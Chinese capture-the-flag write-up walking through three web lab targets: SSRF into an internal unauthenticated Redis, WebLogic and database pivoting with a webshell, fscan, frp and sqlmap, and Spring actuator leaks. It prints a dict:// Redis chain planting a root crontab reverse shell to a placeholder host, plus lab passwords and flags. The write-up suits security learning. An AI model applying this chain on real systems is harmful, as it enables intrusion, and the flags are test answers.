CTF之web题集详情随手条记
《Web安全》https://csdnimg.cn/release/blog_editor_html/release2.3.7/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=O83Ahttp://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484238&idx=1&sn=ca66551c31e37b8d726f151265fc9211&chksm=c0e47a12f793f3049fefde6e9ebe9ec4e2c7626b8594511bd314783719c216bd9929962a71e6&scene=21#wechat_redirect1 WEB 1
https://img-blog.csdnimg.cn/img_convert/d318e175a801580b9fa737e38a53ce28.gif
靶场目标:http://43.137.34.103/
https://img-blog.csdnimg.cn/img_convert/e079ec6aa8b8ebdd63a3c39e08eb2c93.png
可以直观的看到一个爬虫类的网页。用我犀利的眼就能很明显感觉到可能存在SSRF毛病,所以接下来我直接就看看能不能爬取百度或者当前的网页
直接就跳转了,这里思路直接就使用file命里检察文件。
https://img-blog.csdnimg.cn/img_convert/63fe38ebc3e1592e7c7909e402ac5925.png
https://img-blog.csdnimg.cn/img_convert/433904128abb9a5cc98cf3a53e39b629.png
比及passwd文件和hosts头,判断内网ip范围为172.19.240.0
flag文件在根目次下面
https://img-blog.csdnimg.cn/img_convert/27c7b4b3277cf20b83be3514816f29ea.png
flag1:meetsec1{6d5e5c2bb397ba7727b58df59b35f66a}
接下来是举行内网探测,看看存在其他服务不,可以直接使用ssrfmap工具
这里还是手工做,用bp的自定义迭代器扫描,写一个小脚本
https://img-blog.csdnimg.cn/img_convert/8b3e3b3a226ce57f29e67484959cdfad.png
https://img-blog.csdnimg.cn/img_convert/826bdc08bbc208c20508c64fb7e921ef.png
题目提示是数据库服务,但我晚上做的时间两个小时也没有扫出来服务,最后常用端口扫
描,才发现存在一个redis,属于是被绕到了,忘了redis也是数据库
https://img-blog.csdnimg.cn/img_convert/26f807376f3e7f8250991eb9fdd187b6.png
内网探活,172.19.240.7:6379服务,这里应该是redis未授权
https://img-blog.csdnimg.cn/img_convert/c8cf2db15ada25ac38b5dd5a168ccb3a.png
https://img-blog.csdnimg.cn/img_convert/1d06c7d16e34299af6f6464a23cc12c3.png
https://img-blog.csdnimg.cn/img_convert/0a3a3180b5f3003e86da882b7965d0d5.png
得到了第二个flag:meetsec2{2b7cc5b73fe867cc83546583b858c8ab}
第三个flag存在于这台主机的根目次,所以这里就用操持使命上线
[*]
[*]
[*]
[*]
[*]
[*]
dict://172.19.240.7:6379/flushalldict://172.19.240.7:6379/config set dir /var/spool/cron/dict://172.19.240.7:6379/config set dbfilename rootdict://172.19.240.7:6379/set xshell "\n* * * * * /bin/bash -i >&/dev/tcp/x.x.x.x/5555 0>&1\n"dict://172.19.240.7:6379/save
https://img-blog.csdnimg.cn/img_convert/d6c057b36971d5a90faed6cc7bcc1827.png
第三个flag:meetsec3{f22eec9fb7c498b3a747392ff53a746b}
2 WEB 2
https://img-blog.csdnimg.cn/img_convert/d318e175a801580b9fa737e38a53ce28.gif
靶场目标43.137.34.103:7001
https://img-blog.csdnimg.cn/img_convert/de84dee721c759c7a4f9e632f07f27cd.png
这个界面,根本都是weblogic服务,直接就检察什么版本
https://img-blog.csdnimg.cn/img_convert/7a9402754a618b65a8105ea965aa8066.png
用专门的漏扫看看有没有存在汗青毛病
https://img-blog.csdnimg.cn/img_convert/0dae2ba8c3871daff403fa72c9804b59.png
https://img-blog.csdnimg.cn/img_convert/732695a4613fc45f11234aa282f066b2.png
https://img-blog.csdnimg.cn/img_convert/d3fc82c87039767c492bc11765b87132.png
第一个flag:meetsec1{3e942fd37767def3a9f68cf5ee6ebee5}
第二个flag在内网的第二台主机中,这里先上个哥斯拉
https://img-blog.csdnimg.cn/img_convert/533c7f24516e20727c784bcbd1584197.png
https://img-blog.csdnimg.cn/img_convert/b5e2f01d7f8e2a1a3677592f331ef1e3.png
https://img-blog.csdnimg.cn/img_convert/c6bb0e5b7766098b55b10715c9fde9f2.png
直接上传一个fscan,扫一下内网服务
https://img-blog.csdnimg.cn/img_convert/b31f2bc5de0e75fd253e1fe8899b335d.png
https://img-blog.csdnimg.cn/img_convert/5181d7ca1bf578e0cd534b4cdd6e38ca.png
网段为172.16.10.0/24和172.25.20.0/24
https://img-blog.csdnimg.cn/img_convert/e086e96dc3528912a532efec83b34aaa.png
https://img-blog.csdnimg.cn/img_convert/035156a5d87512692489ec8edbfd7298.png
https://img-blog.csdnimg.cn/img_convert/c860e6f60def4b6ac32166074eff7039.png
这里不知道是不是,我扫描器的题目,还是靶场的题目,我在备用目标中,才把3306扫出
来,第一个目标并没有扫出来。
这里的到目标是172.25.20.12:3306,通过frp,接入内网
https://img-blog.csdnimg.cn/img_convert/031d2727eec49427a7de0c604362de81.png
https://img-blog.csdnimg.cn/img_convert/fc0ab371a64badc9fa5de5fbc8d91771.png
接入到内网中,这里流量时全局,直接用kali,打一手爆破试试
https://img-blog.csdnimg.cn/img_convert/7c3a39147fbaa4f81976cc4cafeeda66.png
https://img-blog.csdnimg.cn/img_convert/fe51daea26f4d1f75b19c5e58a02ddfd.png
不过在半个小时后,我感觉到了,这里好像不是弱口令爆破,weblogic可以用jdbc做数据源
连接,可能是做的一个站库分离的利用
https://img-blog.csdnimg.cn/img_convert/7a340bd5ad9696eb87e046e64ed41539.png
在jdbc连接里面找到了数据库的账户和加密密文,从官网检察了解,可以使用官方的解密工
具得到明文,不过必要拿到,一个bat文件
https://img-blog.csdnimg.cn/img_convert/bcb39d49c11f43dac7459ddab0d0d6ba.png
得到密码Meetsec#1024,账户root
用navicat直接连接
https://img-blog.csdnimg.cn/img_convert/75c2745da513848e49344306cd07efda.png
得到第二个flag
第三个flag在主机根目次下,这里用sqlmap长途连接os-shell
https://img-blog.csdnimg.cn/img_convert/f7a11776c3d9eed885de7e55e2e8275b.png
https://img-blog.csdnimg.cn/img_convert/b1741df9f7ce088c441cd8a57cb07a97.png
meetsec3{2e947aef43be6dc428a9c626ba7fb824}
本来想本日把第四个flag拿了的,但是情况打不开了,一直卡住,接下来想从os-shell反弹
shell,在上传文件,扫描第三个内网段
明天看看还能不能打开吧。
3 WEB 3 4
https://img-blog.csdnimg.cn/img_convert/d318e175a801580b9fa737e38a53ce28.gif
目标43.137.9.106:22883、43.137.9.106:13306
web3给的两个地址,第一个flag是信息走漏,第二个flag是存在数据库中
打开第一个网站界面
https://img-blog.csdnimg.cn/img_convert/7c14efe4688e8ad213a24e09951044b0.png
看不出东西来,直接扫一下目次试试
https://img-blog.csdnimg.cn/img_convert/b7bdf17950fec6b8d829f16d916f8d3e.png
从地址看,根本上就是spring的框架,直接看看env变量的文件
https://img-blog.csdnimg.cn/img_convert/5665dc74c18f3b64a575b42c266def29.png
得到第一个信息走漏的flag:meetsec1{e20cdd96b8985a3557e5720726bb09a8}
不过也得到了,第二个flag的线索,jdbc连接,数据保存在heapdump里,账户是meetsec
所以下面就是看看这个heapdump怎么解密,
https://img-blog.csdnimg.cn/img_convert/1b6c66da400bc9a81f8af4e60ff3078d.png
https://img-blog.csdnimg.cn/img_convert/cfd9b2ba5c22259fc9d85c6c08a87c2c.png
https://img-blog.csdnimg.cn/img_convert/d09d7a589e8139c5153dada614b7e93f.png
得到密码为MeetSec@2nd!2022
直接用navicat连接
https://img-blog.csdnimg.cn/img_convert/1e6036c67c292221c93919e458dfccb2.png
得到第二个flag meetsec2{9edbd4b03b5f86a9abe079bc63ea847b}
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]